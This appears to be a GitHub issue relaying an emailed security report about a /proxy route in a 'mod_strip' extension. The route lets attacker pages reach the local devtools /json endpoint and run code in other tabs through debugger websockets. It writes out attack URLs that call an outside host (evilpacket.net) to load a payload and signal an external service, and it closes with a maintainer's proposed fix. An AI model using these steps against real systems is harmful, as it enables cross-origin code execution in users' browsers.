You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
As reported by Adam Baldwin from andyet over email
Getting access to devtools
I'm curious to know what the /proxy route is actually used for on the
mod_strip extension? It allows for some interesting things. Specifically
one can use that route to load a page controlled by an attacker and
execute code.
Further then that code could attempt to locate the port the devtools are
running on and find the various endpoints for the open tabs at the /json
endpoint.
Normally this would be blocked by same origin policy but because of the
proxy route it's possible to get those endpoints. Having the content of
that json file means a debugger websocket connection can be made to each
of those tabs and code executed in the context of those tabs, which
gives xss on a variety of origins.
It would be pretty messy to exploit but here is how I would go about it.
Make requests to the following url to find the local port that allows
proxy.
127.0.0.1:PORT/proxy?url=http://evilpacket.net
Make requests to the following url to find the dev tools port that
will give me the json endpoints. When it hits the right one it will
notify the external service and we can correlate the 2 events. http://127.0.0.1:PORT/devtools/devtools.html?ws=evilpacket.net
Redirect user to the following url so that we can use same origin
policy to get the json in the next step
127.0.0.1:PORT_FROM_STEP_1/proxy?url=http://evilpacket.net/payload
The proxy is used today to proxy the favicons in order to sniff their color. We could automatically retrieve the favicon from the module server side and pass ids instead of URLs to the client side to retrieve the content of these favicons, removing the need for the proxy.
As reported by Adam Baldwin from andyet over email
The text was updated successfully, but these errors were encountered: